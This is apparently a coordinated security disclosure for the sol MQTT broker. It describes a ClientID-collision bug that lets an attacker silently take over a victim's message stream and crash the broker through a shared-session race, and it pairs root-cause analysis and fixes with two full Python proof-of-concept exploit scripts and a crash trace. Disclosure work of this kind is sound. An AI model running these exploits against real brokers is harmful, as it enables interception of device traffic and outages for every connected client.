ClientID-collision silent subscription/message hijack and shared-session remote crash

## Executive Summary

---


The **sol** MQTT broker (self-identified as MQTT 3.1.1, `sol.c:62`) fails to disconnect an existing client when a second connection reuses the same ClientID, in violation of the binding MQTT 3.1.1 requirement **[MQTT-3.1.4-2]** ("the Server MUST disconnect the existing Client"). Because sol relies on `uthash` without deduplication and routes publishes by first-match bucket lookup, an attacker who knows or guesses a victim's ClientID can (a) **silently receive all of the victim's subsequently-published subscribed-topic messages** while the victim's connection stays open and receives nothing, and (b) trigger a **remote null-dereference / use-after-free crash** that takes down the entire single-process broker for every connected client. Both consequences reproduce dynamically from the network with two client connections plus a publisher; under the default `allow_anonymous=true` configuration no credentials are required. 

[poc.zip](https://github.com/user-attachments/files/29039579/poc.zip)

## Metadata

| Field | Value |
|---|---|
| **Affected product** | sol MQTT broker — version **0.18.5** (and, in all likelihood, every release that carries this `connect_handler` / shared-session design) |
| **Component** | Connection & session management — `connect_handler` (`src/handlers.c`), `publish_message`, ack handlers, inflight-retry cron (`src/server.c`), `struct client_session` (`src/sol_internal.h`) |
| **Authentication** | **Pre-auth** under the compiled default `allow_anonymous=true` (`config.c:368`). With authentication enabled, any single valid low-privilege account suffices to intercept/crash other clients. |
| **Embargo / coordinated disclosure** | Target disclosure window: 90 days from first contact; exact public-disclosure date to be agreed with the maintainer |
| **Status** | Coordinated / responsible disclosure — not yet public |

---

## Affected versions & configuration

- **Version**: sol **0.18.5** (set in `CMakeLists.txt:4`), C, source root `src/`.
- **Protocol**: MQTT **3.1.1** — `sol.c:62` prints `Sol v%s MQTT broker 3.1.1`; `README.md:8` advertises "almost all MQTT v3.1.1 commands". The CONNECT unpacker never inspects the protocol-level byte (`mqtt.c:223-227` skips straight past it), and no v5.0 property/reason-code path exists anywhere in `src/`. The binding bar for this implementation is therefore the **MQTT 3.1.1** spec, with v5.0 cited only as context.
- **Configuration**:
  - `allow_anonymous = true` is the compiled-in default (`config.c:368` in `config_set_default()`); it is flipped to `false` only by an explicit config line equal to the string `"false"` (`config.c:246-251`). Under the default the issue is **pre-auth**.
  - The crash race requires a non-zero worker-thread pool: **`THREADSNR = 2`** is the default (`server.h:39`), so the race is present in default builds. With `THREADSNR == 0` the hijack still occurs but the concurrent-`ref_dec` crash is not reachable (single-threaded serialisation).
- **Most likely all prior versions** with this `connect_handler` / shared-session design are affected; we have only independently verified 0.18.5.

---

## Technical overview

A single missing control — disconnecting the existing live connection on a duplicate-ClientID CONNECT — yields two distinct, both-network-observable consequences:

1. **Silent subscription/message-stream interception.** When a second CONNECT arrives with a ClientID already present in `server.clients_map`, sol leaves the original connection alive and *prepends* the new client into the same uthash bucket. `publish_message` resolves subscribers via first-match bucket lookup, so the **most-recently-added** connection (the attacker) deterministically receives subsequent PUBLISHes for that ClientID/session, while the still-connected victim silently receives nothing. The victim gets no DISCONNECT, so the interception is invisible.

2. **Remote crash DoS.** With `clean_session=false`, the second CONNECT also **reuses the victim's `struct client_session` by pointer** with no session-level lock. The inflight-retry cron (`inflight_msg_check`, registered every 1 s, re-sending anything held > 20 s) iterates *all* clients including both colliding entries and operates concurrently on the shared session's `i_msgs[]` / refcounts across the two worker threads. A PUBACK clearing an inflight slot on one connection can race against a duplicate/cron-driven clear on the other, producing a `ref_dec` on a `NULL` packet pointer and a SEGV that aborts the whole broker.

---

## Root cause analysis

### 1. The "kick out" comment is dead code; no existing connection is ever closed.

`connect_handler` carries an aspirational comment but performs no eviction:

```c
/* handlers.c:390-393 */
/*
 * Add the new connected client to the global map, if it is already
 * connected, kick him out accordingly to the MQTT v3.1.1 specs.
 */
```

The code below it looks up only the **session** table and never the live-connection table:

```c
/* handlers.c:400-405 */
HASH_FIND_STR(server.sessions, cc->client_id, cc->session);
if (cc->session && c->bits.clean_session == true)
    HASH_DEL(server.sessions, cc->session);     /* removes only the SESSION entry */
else if (cc->session)
    session_present = 1;                        /* session-reuse branch */
```

`server.sessions` is the **session store**; the live connections live in `server.clients_map`. There is **no `HASH_FIND_STR` on `server.clients_map` anywhere in `connect_handler`** — the only such lookup in the file is in `publish_message` (`handlers.c:167`). There is **no `client_deactivate()` call and no DISCONNECT send** on the colliding path. The `client_deactivate()` call sites are exclusively on a client's own read-error/disconnect teardown (`server.c:709/833/884`), and the only `HASH_DEL(server.clients_map, ...)` lives inside `client_deactivate` (`server.c:441`), never on connect. So the pre-existing connection stays authenticated and online (its `online` flag, set at `client_init`/accept in `server.c:383`, is cleared only in its own `client_deactivate` at `server.c:425`).

The session-HASH_DEL at line 403 and the `session_present=1` at line 405 touch only the session table, never the live socket.

### 2. Duplicate ClientID keys coexist in `clients_map`.

```c
/* handlers.c:425 */
HASH_ADD_STR(server.clients_map, client_id, cc);   /* unconditional */
```

This call is guarded only by the global `mutex` (taken at `handlers.c:397`), not by any duplicate-key check. sol's bundled uthash does **not** deduplicate: `HASH_ADD_TO_BKT` (`src/uthash.h:869-884`) merely prepends `addhh` to the bucket's `hh_head` list with no key-equality check, and `HASH_ADD_TO_TABLE` (`uthash.h:376-385`) likewise enforces no uniqueness. Two `struct client` entries with identical `client_id` therefore coexist.

### 3. The colliding CONNECT reuses the victim's session by pointer.

On the `clean_session=false` collision path, the session-reuse branch is taken and allocation is skipped:

```c
/* handlers.c:416 */
if (c->bits.clean_session == true || !cc->session) {
    cc->session = client_session_alloc(cc->client_id);   /* NOT taken on reuse */
    ...
}
```

Since `cc->session` was already populated by the `HASH_FIND_STR` at line 400, the new client's `cc->session` ends up pointing to the **same** `struct client_session` the already-connected victim is using. Three references to one struct now coexist: the `server.sessions` uthash entry, the victim's `c->session`, and the attacker's `cc->session`. No deep copy occurs. `session_present=1` (`handlers.c:405`) is later passed to `set_connack` (`handlers.c:471`) as the CONNACK Session-Present flag (`set_connack` writes `0 | (sp & 0x1) << 0`, `handlers.c:311`) — observed as `SP=1` in the PoC.

### 4. Routing uses first-match bucket lookup → newest connection wins.

```c
/* handlers.c:167 */
HASH_FIND_STR(server.clients_map, s->session_id, sc);
```

`HASH_FIND_STR` → `HASH_FIND` → `HASH_FIND_BYHASHVALUE` → `HASH_FIND_IN_BKT` (`src/uthash.h:846-866`) walks the bucket chain from `hh_head` and **breaks on the first key match** (`uthash.h:853-857`). Because `HASH_ADD_TO_BKT` prepends (`uthash.h:873-878`), `hh_head` is the most-recently-added entry. Both connections hash to the same bucket (identical key string), so the lookup returns the **attacker** (B, added second). This is why subsequent PUBLISHes for that ClientID are delivered to the attacker and not to the victim.

(Clarifying "head": here "head" means the bucket's `hh_head`, set by prepend = most-recently-added — not the global uthash list head, which `HASH_APPEND_LIST` appends to. The publish-routing path uses the bucket chain, so "most-recently-added" is the right description.)

### 5. No session-level lock; the shared session is mutated concurrently.

`struct client_session` (`sol_internal.h:225-244`) has **no `pthread_mutex_t` member** — only `UT_hash_handle hh` and `struct ref refcount`. The per-client lock lives on `struct client` (`sol_internal.h:208`), not the session. The ack handlers that DECREF inflight packets lock only the calling client's mutex:

```c
/* handlers.c:791, 793-794 */
pthread_mutex_lock(&c->mutex);
...
inflight_msg_clear(&c->session->i_msgs[pkt_id]);   /* DECREF(packet) then ... */
c->session->i_msgs[pkt_id].packet = NULL;          /* ... clears the slot */
```

`pubcomp_handler` (`handlers.c:839-855`, DECREF at line 848) follows the same single-`c->mutex` pattern. Because `c1->session == c2->session` but `c1->mutex != c2->mutex`, two threads can mutate the same `i_msgs[]` / `i_acks[]` / `inflights` / `next_free_mid` with no lock in common.

**Precision on locking asymmetry (important):** the *publish side* of these mutations **is** guarded — `publish_message` takes the global `mutex` (`handlers.c:152`), which covers `next_free_mid()` (line 189) and the inflight writes (lines 202-204 offline / 216-218 online). The **ack side** (`puback`/`pubcomp`) takes only `c->mutex`, **not** the global `mutex`. (Note: `pubrec_handler` at `handlers.c:803-820` does take `c->mutex` at line 809, but its only shared-session write — `c->session->i_acks[pkt_id] = time(NULL)` at line 817 — sits *outside* that lock; it does not mutate `i_msgs[]` and does not DECREF, so it is the weakest example of the pattern.) The hazard is the missing lock shared between `c1->mutex` and `c2->mutex`, combined with the ack side bypassing the global lock that protects the publish side. That asymmetry, plus the absence of any session-level lock, is the real root cause.

### 6. The inflight-retry cron is the path that hits both colliding connections.

```c
/* server.c:327-330 */
// TODO remove 20 hardcoded value
...
if (c->session->i_msgs[i].packet &&
    (now - c->session->i_msgs[i].seen) > 20) {
```

The cron is registered to fire every 1 second:

```c
/* server.c:937 */
ev_register_cron(&ctx, inflight_msg_check, NULL, 1, 0);
```

Critically, `inflight_msg_check` iterates clients with **`HASH_ITER`** (`server.c:319`), which visits **every** entry — including **both** colliding entries with the duplicate ClientID. The publish-routing path, by contrast, uses `HASH_FIND_STR` (first-match only) and thus funnels traffic to a single connection. This routing-vs-cron iteration difference is precisely why the **20 s-retry cron path — and only it** — concurrently replays the shared `i_msgs[]`, creating the double-`ref_dec` / NULL-packet window that crashes the broker. This also explains why naive high-throughput stress (routing-funnelled) does not crash, while the deliberate unacked-inflight + takeover sequence does.

---

## Specification context

sol is an MQTT **3.1.1** broker. The binding obligation it violates is the OASIS MQTT 3.1.1 requirement, numbered **[MQTT-3.1.4-2]** in the 3.1.1 spec (note: in the 3.1.1 numbering scheme — the collision rule's ID differs in v5.0; see the correction below):

> **MQTT 3.1.1 §3.1.4 [MQTT-3.1.4-2]:** "If the ClientID represents a Client already connected to the Server then the Server **MUST disconnect the existing Client** [MQTT-3.1.4-2]."

sol does not comply: on a duplicate ClientID it neither sends a DISCONNECT to nor closes the pre-existing live connection.

For informational context, MQTT **v5.0** strengthens the same obligation (and assigns it a **different** normative ID, **[MQTT-3.1.4-3]**, *not* [MQTT-3.1.4-2]). From the v5.0 spec text:

> §3.1.4 "CONNECT Actions", lines 4760-4765: "If the ClientID represents a Client already connected to the Server, the Server sends a DISCONNECT packet to the existing Client with Reason Code of **0x8E (Session taken over)** as described in section 4.13 and **MUST close the Network Connection of the existing Client [MQTT-3.1.4-3]**."

> Normative-statement table (lines 12316-12324) restates [MQTT-3.1.4-3] verbatim.

> Reason-code definition (line 9211): "142  **0x8E**  Session taken over  Server  Another Connection using the same ClientID has connected causing this Connection to be closed."

**Numbering correction (please cite carefully):** the two specs use different IDs for the collision rule. In **MQTT 3.1.1** it is **[MQTT-3.1.4-2]**; in **MQTT v5.0** the collision/takeover rule is **[MQTT-3.1.4-3]** — v5.0's [MQTT-3.1.4-2] is a *different* statement about authentication/authorization checks (`MQTT-v5.0.txt:4749` / 12308-12314). Because sol is a 3.1.1 broker, the **binding** requirement it fails is the 3.1.1 [MQTT-3.1.4-2] "MUST disconnect the existing Client". The v5.0 [MQTT-3.1.4-3] 0x8E-DISCONNECT requirement is **informational context** showing how the obligation is strengthened in the newer spec; it is not a normative bar that a 3.1.1-only implementation is held to (sol already fails the lower 3.1.1 bar by leaving the old connection live).

---

## Impact

- **Confidentiality (High).** The victim's entire subsequent subscribed-topic message stream is silently diverted to the attacker. The PoC shows that after the attacker's collision CONNECT, the victim receives nothing (`CLAIM3: A msgs=[]`) while the attacker receives every PUBLISH (`CLAIM2: B msgs=[b'hijacked-2']`). For IoT deployments where ClientIDs are frequently fixed/guessable device identifiers, this is a full-stream disclosure.

- **Integrity (High).** The attacker becomes a silent MITM on the victim's stream — able to swallow, forge, or replay commands destined for IoT devices. Separately, the shared-session race corrupts the victim's `next_free_mid` / `i_msgs[]` / `i_acks[]` / `inflights` state, so even non-intercepted traffic is at risk of misdelivery or silent loss.

- **Availability (High).** The concurrent double-clear of a shared inflight slot drives `ref_dec` on a `NULL` packet pointer (`SEGV on unknown address 0x80 (WRITE, zero page)` in `ref_dec` at `ref.h:52`, reached via `puback_handler` at `handlers.c:793`). This is a **structural** null/UAF dereference that will SIGSEGV a release build as well — it is **not** an ASan-only artifact; ASan merely makes reproduction reliable. Because sol is a single process with no SIGSEGV handler, the crash takes the broker down for **every** connected client.

- **Stealth.** Because sol never sends a DISCONNECT (let alone a v5.0 0x8E "Session taken over") to the displaced client, the victim's connection shows no sign of having been taken over — its keepalive PINGREQ/PINGRESP still round-trips (PoC `CLAIM1`). Detection by the victim requires correlating a silent drop in message delivery with a takeover event, which is impractical in normal telemetry.

- **Exploitability framing.** The hijack is low-complexity and reliable at normal connection counts. The crash is timing-gated but the window is **fully attacker-controlled** (the attacker chooses PUBACK cadence and the takeover instant), so it does not rise to AC:H; note that bare high-throughput stress (~1.1M messages) does *not* crash because routing funnels traffic to a single connection and starves the concurrent-ack condition — the reliable trigger is the deliberate unacked-inflight + takeover sequence shown in the crash PoC.

---

## Proof of Concept

All PoCs are bare MQTT 3.1.1 over plain TCP; no third-party Python dependencies. They target `127.0.0.1:1884` against `sol_bin` (hijack) or `sol_asan` (crash). Files live in-tree at `poc/`.

### Build & run

```bash
cd /path/to/sol
# Release build (for the hijack PoC):
cmake -B build-release && cmake --build build-release -- -j
# ASan/UBSan build (for the crash PoC):
cmake -B build-debug -DDEBUG=ON && cmake --build build-debug -- -j

# Run the broker with the minimal plain-TCP config (omits cafile so tls=false),
# binding 127.0.0.1:1884, and record its PID for the crash PoC's watchdog:
./build-debug/sol -c sol_poc.conf & echo $! > /tmp/sol_asan.pid

# Hijack (7/7):
python3 mqtt004_hijack.py
# Crash (~40 s; tail the broker's stderr or check exit code):
python3 mqtt004_cron_race.py
```

### PoC 1 — silent subscription/message hijack (`mqtt004_hijack.py`)

Minimal reproducer (self-contained; verbatim from the verified file):

```python
#!/usr/bin/env python3
"""MQTT_004 PoC - ClientID-collision subscription/message hijack against sol.
Bucket-A (fully network-observable). Raw MQTT 3.1.1 over plain TCP, no deps."""
import socket, struct, time, sys

HOST, PORT = "127.0.0.1", 1884
VICTIM_ID = "victim-device-001"
TOPIC = "secret/sensor/data"

def rl(n):
    out = bytearray()
    while True:
        b = n % 128; n //= 128
        if n: b |= 128
        out.append(b)
        if not n: break
    return bytes(out)

def s16(s):
    b = s.encode() if isinstance(s, str) else s
    return struct.pack("!H", len(b)) + b

def pkt(typ, flags, payload):
    return bytes([((typ & 0xF) << 4) | (flags & 0xF)]) + rl(len(payload)) + payload

def connect(client_id, clean=True, keepalive=60, username=None, password=None):
    vh = s16("MQTT") + b"\x04"                 # level 4 == 3.1.1
    flags = 0x02 if clean else 0x00            # bit1 = clean session
    pl = s16(client_id)
    if username is not None: flags |= 0x80; pl += s16(username)
    if password is not None: flags |= 0x40; pl += s16(password)
    vh += struct.pack("!BH", flags, keepalive)
    return pkt(1, 0, vh + pl)                  # CONNECT = 1

def subscribe(pktid, topic, qos=0):
    return pkt(8, 0x02, struct.pack("!H", pktid) + s16(topic) + bytes([qos]))

def publish(topic, msg, qos=0, retain=False):
    flags = (qos << 1) | (0x01 if retain else 0x00)
    payload = s16(topic)
    if qos > 0: payload += struct.pack("!H", 1)
    return pkt(3, flags, payload + (msg.encode() if isinstance(msg, str) else msg))

PINGREQ = bytes([0xC0, 0x00])
DISCONNECT = bytes([0xE0, 0x00])

def recvn(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk: raise ConnectionError("peer closed")
        buf += chunk
    return buf

def recv_pkt(sock, timeout=2.0):
    sock.settimeout(timeout)
    try:
        hdr = recvn(sock, 1)
    except socket.timeout:
        return None
    if not hdr: return None
    t = hdr[0] >> 4; flags = hdr[0] & 0xF
    mult = 1; rem = 0; got = 0
    while True:
        b = recvn(sock, 1)[0]; got += 1
        rem += (b & 0x7F) * mult
        if not (b & 0x80): break
        mult *= 128
        if got > 4: return None
    payload = recvn(sock, rem) if rem else b""
    return (t, flags, payload)

def drain(sock, t=0.4):
    out = []
    while True:
        p = recv_pkt(sock, timeout=t)
        if p is None: break
        out.append(p)
    return out

def parse_publish(payload):
    tlen = struct.unpack("!H", payload[:2])[0]
    topic = payload[2:2 + tlen].decode(errors="replace")
    msg = payload[2 + tlen:]
    return topic, msg

def main():
    results = []
    def check(name, cond, detail=""):
        results.append((name, cond, detail))
        print(f"  [{'PASS' if cond else 'FAIL'}] {name}" + (f"  - {detail}" if detail else ""))

    # A: victim - clean=False so session is reused on collision
    A = socket.create_connection((HOST, PORT))
    A.sendall(connect(VICTIM_ID, clean=False))
    ack = recv_pkt(A)
    check("A CONNECT accepted", ack and ack[0] == 2 and ack[2][1] == 0,
          f"CONNACK rc={ack[2][1] if ack else 'none'}")
    A.sendall(subscribe(1, TOPIC, 0))
    suback = recv_pkt(A)
    check("A SUBSCRIBE acked", suback and suback[0] == 9,
          f"SUBACK granted={list(suback[2][2:]) if suback else 'none'}")

    # Publisher P
    P = socket.create_connection((HOST, PORT))
    P.sendall(connect("publisher-X", clean=True)); recv_pkt(P)

    # Baseline: A should get a publish before the hijack
    P.sendall(publish(TOPIC, "baseline-1")); time.sleep(0.4)
    base_recv = [p for p in drain(A) if p[0] == 3]
    check("baseline: A receives PUBLISH before hijack",
          any(parse_publish(p[2])[1] == b"baseline-1" for p in base_recv),
          f"{len(base_recv)} publish(es) on A")

    # Attacker B: SAME ClientID, clean=False -> reuses A's session
    B = socket.create_connection((HOST, PORT))
    B.sendall(connect(VICTIM_ID, clean=False))
    back = recv_pkt(B)
    check("B CONNECT accepted (collision)", back and back[0] == 2 and back[2][1] == 0,
          f"CONNACK rc={back[2][1] if back else 'none'}, SP={back[2][0] if back else '?'}")

    # CLAIM1: A still alive after takeover (sol did NOT close it)
    time.sleep(0.5); A.sendall(PINGREQ); pr = recv_pkt(A, timeout=2.0)
    check("CLAIM1: A still alive after takeover (sol did NOT close it)",
          pr is not None and pr[0] == 13,                       # 13 == PINGRESP
          "PINGRESP received" if pr and pr[0] == 13 else
          (f"got type={pr[0]}" if pr else "no response (closed?)"))

    # CLAIM2/3: who gets the post-takeover publish?
    P.sendall(publish(TOPIC, "hijacked-2")); time.sleep(0.6)
    a_msgs = [parse_publish(p[2])[1] for p in drain(A, 0.4) if p[0] == 3]
    b_msgs = [parse_publish(p[2])[1] for p in drain(B, 0.4) if p[0] == 3]
    check("CLAIM2: attacker B receives the post-takeover PUBLISH",
          any(m == b"hijacked-2" for m in b_msgs), f"B msgs={b_msgs}")
    check("CLAIM3: victim A does NOT receive the post-takeover PUBLISH",
          not any(m == b"hijacked-2" for m in a_msgs), f"A msgs={a_msgs}")

    print("\n=== SUMMARY ===")
    for n, c, _ in results: print(f"  {'OK' if c else 'XX'} {n}")
    hijack = all(c for _, c, _ in results[6:])
    print(f"\nVERDICT: MQTT_004 hijack {'CONFIRMED' if hijack else 'NOT confirmed'} "
          f"({sum(c for _,c,_ in results)}/{len(results)} checks passed)")

    try:
        B.sendall(DISCONNECT); B.close()
        A.sendall(DISCONNECT); A.close()
        P.sendall(DISCONNECT); P.close()
    except OSError:
        pass

if __name__ == "__main__":
    try:
        main()
    except (ConnectionError, OSError) as e:
        print(f"ERROR connecting to sol @ {HOST}:{PORT}: {e}", file=sys.stderr)
        sys.exit(2)
```

**Observed output (two independent clean runs, identical):**

```
[PASS] A CONNECT accepted — CONNACK rc=0
[PASS] A SUBSCRIBE acked — SUBACK granted=[0]
[PASS] baseline: A receives PUBLISH before hijack — 1 publish(es) on A
[PASS] B CONNECT accepted (collision) — CONNACK rc=0, SP=1     ← SP=1 confirms session-reuse branch
[PASS] CLAIM1: A still alive after takeover (sol did NOT close it) — PINGRESP received
[PASS] CLAIM2: attacker B receives the post-takeover PUBLISH — B msgs=[b'hijacked-2']
[PASS] CLAIM3: victim A does NOT receive the post-takeover PUBLISH — A msgs=[]
VERDICT: MQTT_004 hijack CONFIRMED (7/7)
```

> Note: the broker may also core-dump during the PoC's DISCONNECT teardown (observed `aborted (core dumped)` at the kill/wait line in two runs). That is a **third symptom** of the same shared-session/refcount bug (consistent with the cron-race UAF below), triggered by both A and B tearing down the same `client_session`. The 7 hijack assertions do not depend on the crash; report it as an additional crash vector, not as a flaw in the demonstration.

### PoC 2 — remote crash via shared-session refcount race (`mqtt004_cron_race.py`)

Scenario: A (`clean=false`) subscribes at QoS1; the publisher P sends 39 QoS1 PUBLISHes that A does **not** ack (they stay inflight in the shared session's `i_msgs`); wait 22 s so sol's 20 s inflight-retry cron (`server.c:329-330`) is armed; then attacker B connects with the same ClientID (session reuse). The cron's `HASH_ITER` now visits **both** A and B (duplicate keys) and concurrently operates on the same `i_msgs[]`/refcounts across the two worker threads (`THREADSNR=2`). B's PUBACK of a dup retry racing with A's cron retry on the same slot drives `ref_dec` on a `NULL` packet pointer → SEGV.

Minimal harness (verbatim from the verified file; it imports codec helpers from `mqtt004_race.py`):

```python
import socket, struct, time, sys
sys.path.insert(0, '.')
from mqtt004_race import connect, subscribe, publish_qos1, recv_pkt, recvn, rl, s16, pkt
HOST, PORT = "127.0.0.1", 1884
VID = "victim-cron-001"; TOPIC = "secret/cron"

def conn(cid, clean=True):
    s = socket.create_connection((HOST, PORT))
    s.sendall(connect(cid, clean)); recv_pkt(s, 2); return s

A = conn(VID, False); A.sendall(subscribe(1, TOPIC, 1)); recv_pkt(A, 2)
P = conn("pub-cron", True)
# Send QoS1 publishes; A will NOT ack -> they stay inflight in the shared session
for m in range(1, 40):
    P.sendall(publish_qos1(TOPIC, f"hold-{m}", m))
print("sent 39 unacked qos1 -> inflight in shared session; waiting 22s for >20s retry cron...", flush=True)
time.sleep(22)
# Now attacker B reuses the session; cron HASH_ITER will hit BOTH A and B sharing session
B = conn(VID, False)
print("B connected (collision, session reuse). Watching 15s for crash/corruption...", flush=True)
t0 = time.time(); crash = False
while time.time() - t0 < 15:
    if not __import__('os').path.exists(f"/proc/{open('/tmp/sol_asan.pid').read().strip()}"):
        crash = True; break
    # B acks whatever dup retries it gets, racing with A's cron retries on shared i_msgs
    try:
        p = recv_pkt(B, 0.3)
        if p and p[0] == 3 and (p[1] & 0x06):
            pl = p[2]; tl = struct.unpack("!H", pl[:2])[0]
            mid = struct.unpack("!H", pl[2 + tl:4 + tl])[0]
            B.sendall(pkt(4, 0, struct.pack("!H", mid)))   # PUBACK
    except (socket.timeout, ConnectionError, OSError):
        pass
print("CRASHED" if crash else "no crash in window")
for s in (A, B, P):
    try: s.close()
    except: pass
```

> **Harness caveat (does not affect the bug's validity):** the in-process `/proc/PID` watchdog can be defeated if the Python client itself first trips `struct.error: unpack requires a buffer of 2 bytes` on a short/malformed dup retry it receives on B. The broker **does** still crash — confirmed by reading the broker's stderr log, which contains the full ASan SEGV trace and `==ABORTING==`, and by `kill -0` showing the process dead. For reliable reporting, harden the harness by wrapping the recv/parse in `try/except` to ignore short/malformed re-sends, or simply tail the broker's stderr / exit code. The PID file `/tmp/sol_asan.pid` must be written by the launcher (or the harness needs a fallback), since the watchdog reads it.

---

## Suggested remediation

These are suggestions, not demands. The minimal, spec-aligned fix is the first item; the rest harden the shared-session invariant.

1. **Disconnect the existing client on ClientID collision (binding 3.1.1 [MQTT-3.1.4-2]).** In `connect_handler`, before `HASH_ADD_STR(server.clients_map, client_id, cc)` at `handlers.c:425`, perform a `HASH_FIND_STR(server.clients_map, cc->client_id, existing)`; if found and `existing != cc`, send it a DISCONNECT (MQTT v5.0: Reason Code **0x8E "Session taken over"**, per [MQTT-3.1.4-3]; MQTT 3.1.1: a bare DISCONNECT) and tear it down via the existing `client_deactivate()` path **before** adding the new client. This makes the long-standing "kick him out" comment at `handlers.c:390-393` finally true and removes the duplicate-key ambiguity entirely.

2. **Do not let two live connections share one `struct client_session` without synchronisation.** Either (a) disallow session reuse while a connection for that ClientID is still online (fail the second CONNECT or take it over atomically as above), or (b) give `struct client_session` its own `pthread_mutex_t` and require it for *every* mutation of `i_msgs[]` / `i_acks[]` / `inflights` / `next_free_mid`, including the publish path, the ack handlers (`puback`/`pubrec`/`pubcomp`), and the `inflight_msg_check` cron. Today the publish side holds only the global `mutex` while the ack side holds only `c->mutex` — there is no lock shared between the two colliding clients, which is the precise root cause of the crash.

3. **Close the locking asymmetry explicitly.** If a session-level lock is added, ensure the inflight-retry cron (`server.c:308-352`, which `HASH_ITER`s and so touches *both* colliding entries) and the ack handlers take it; today the cron's per-client `c->mutex` lock (`server.c:324`) does not serialise access to the shared session because the two colliding clients hold different `c->mutex` instances. Also move `pubrec_handler`'s `c->session->i_acks[pkt_id] = time(NULL)` (`handlers.c:817`) inside its `c->mutex` critical section, or under the new session lock, so it stops being a data race.

4. **Consider replacing the unguarded `HASH_ADD_STR` semantics.** Even after fix 1, an explicit "already-present" check before insertion is safer than relying on uthash's duplicate-key tolerance; it makes the routing table's single-winner invariant a code-level guarantee rather than a uthash-implementation detail (and pre-empts any future expansion-induced ordering surprise, where `HASH_EXPAND_BUCKETS` can reverse intra-bucket order and flip the winner).

---

## References

- MQTT v3.1.1 specification, §3.1.4, normative statement **[MQTT-3.1.4-2]** — "If the ClientID represents a Client already connected to the Server then the Server MUST disconnect the existing Client." (OASIS MQTT Version 3.1.1.)
- MQTT v5.0 specification, §3.1.4 / normative table, statement **[MQTT-3.1.4-3]** — "...the Server sends a DISCONNECT packet to the existing Client with Reason Code of 0x8E (Session taken over) ... and MUST close the Network Connection of the existing Client." (local copy: `RFC/MQTT-v5.0.txt`, lines 4760-4765 and 12316-12324; reason-code definition at line 9211.)
- sol source (version 0.18.5), root `src/`:
  - `handlers.c:390-393` — dead "kick out" comment.
  - `handlers.c:400-405` — session lookup / HASH_DEL / session_present.
  - `handlers.c:416` — session-reuse branch (skips allocation).
  - `handlers.c:425` — unconditional duplicate-key `HASH_ADD_STR`.
  - `handlers.c:167` — `HASH_FIND_STR` first-match routing in `publish_message`.
  - `handlers.c:152, 189, 202-204, 216-218` — publish side guarded by global `mutex`.
  - `handlers.c:791-794, 803-820, 839-855` — ack handlers locking only `c->mutex` while mutating the shared session (note `pubrec`'s `i_acks` write at 817 sits outside its lock).
  - `handlers.c:309-311` — `set_connack` writes Session-Present at bit 0.
  - `sol_internal.h:225-244` — `struct client_session` with no mutex; `sol_internal.h:208` — `struct client` carries the mutex.
  - `server.c:308-352, 937` — inflight-retry cron, 20 s threshold, 1 s cadence, `HASH_ITER` over `clients_map`.
  - `server.c:319, 324` — cron `HASH_ITER` + per-client `c->mutex`.
  - `server.c:381-404` — `client_init` (sets `online=true` at 383, inits `c->mutex` at 403).
  - `server.c:412-446` — `client_deactivate` (clears `online` at 425, `HASH_DEL(clients_map)` at 441).
  - `server.h:39` — `THREADSNR = 2` default.
  - `ref.h:50-52` — `ref_dec` (the crash site).
  - `uthash.h:846-866` (HASH_FIND_IN_BKT, first match), `869-884` (HASH_ADD_TO_BKT, prepend), `951-973` (HASH_EXPAND_BUCKETS, order reversal).
  - `sol.c:62`, `README.md:8` — MQTT 3.1.1 self-identification; `CMakeLists.txt:4` — `VERSION 0.18.5`.
  - `config.c:368, 246-251` — `allow_anonymous=true` default.
- PoCs: `PLVerifier/buchi_verify_workspace/sol/MQTT_004/poc/{mqtt004_hijack.py, mqtt004_cron_race.py, mqtt004_race.py, poc_report.md}`.

---

## Appendix A — ASan/UBSan stack trace (verbatim)

Reproduced by running `sol_asan` (`-DDEBUG=ON`, ASan+UBSan) on `127.0.0.1:1884` and executing `mqtt004_cron_race.py`. UBSan fires first, then ASan:

```
handlers.c:793:5: runtime error: member access within null pointer of type 'struct mqtt_packet'
ERROR: AddressSanitizer: SEGV on unknown address 0x000000000080 (WRITE)
The signal is caused by a WRITE to memory with address #0x000000000080 with insufficient permissions.
 #0 0x... in ref_dec           src/ref.h:52
 #1 0x... in puback_handler    src/handlers.c:793        <- inflight_msg_clear(&c->session->i_msgs[pkt_id])
 #2 0x... in handle_command    src/handlers.c:879
 #3 0x... in process_message   src/server.c:867
 #4 0x... in read_callback     src/server.c:794
 #5 0x... in ev_process_event  src/ev.c:656
 #6 0x... in ev_run            src/ev.c:761
 #7 0x... in eventloop_start   src/server.c:940
 #8 0x... in start_server      src/server.c:1019
 #9 0x... in main              src/sol.c:128
SUMMARY: AddressSanitizer: SEGV src/ref.h:52 in ref_dec
==ABORTING==
```

**Root-cause characterisation of the `0x80` address:** the accessed pointer is `NULL` (an `i_msgs[pkt_id]` slot that was cleared by a prior `puback_handler` run at `handlers.c:794`, `c->session->i_msgs[pkt_id].packet = NULL`), and a concurrent/duplicate puback re-enters `inflight_msg_clear` and calls `ref_dec` on that NULL packet. In the debug build, `&((struct mqtt_packet *)0)->refcount == 0x78`; `struct ref { void (*free)(...); volatile atomic_int count; }`, so `count` lives at `0x78 + 8 == 0x80`. `ref_dec` line 52 decrements `count`, i.e. writes `packet + 0x80`; with `packet == NULL` that write lands at address `0x80` in the zero page → SEGV. The precise classification is therefore **a concurrent double-clear of a shared inflight slot that DECREFs a NULL packet pointer**, leading to a near-null-page write; "use-after-free" is acceptable shorthand, but the exact root cause is the unprotected shared-session NULL slot, which is why ASan reports a SEGV/DEADLYSIGNAL rather than a heap-use-after-free report.

Field	Value
Affected product	sol MQTT broker — version 0.18.5 (and, in all likelihood, every release that carries this `connect_handler` / shared-session design)
Component	Connection & session management — `connect_handler` (`src/handlers.c`), `publish_message`, ack handlers, inflight-retry cron (`src/server.c`), `struct client_session` (`src/sol_internal.h`)
Authentication	Pre-auth under the compiled default `allow_anonymous=true` (`config.c:368`). With authentication enabled, any single valid low-privilege account suffices to intercept/crash other clients.
Embargo / coordinated disclosure	Target disclosure window: 90 days from first contact; exact public-disclosure date to be agreed with the maintainer
Status	Coordinated / responsible disclosure — not yet public

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ClientID-collision silent subscription/message hijack and shared-session remote crash #17

Executive Summary

Metadata

Affected versions & configuration

Technical overview

Root cause analysis

1. The "kick out" comment is dead code; no existing connection is ever closed.

2. Duplicate ClientID keys coexist in `clients_map`.

3. The colliding CONNECT reuses the victim's session by pointer.

4. Routing uses first-match bucket lookup → newest connection wins.

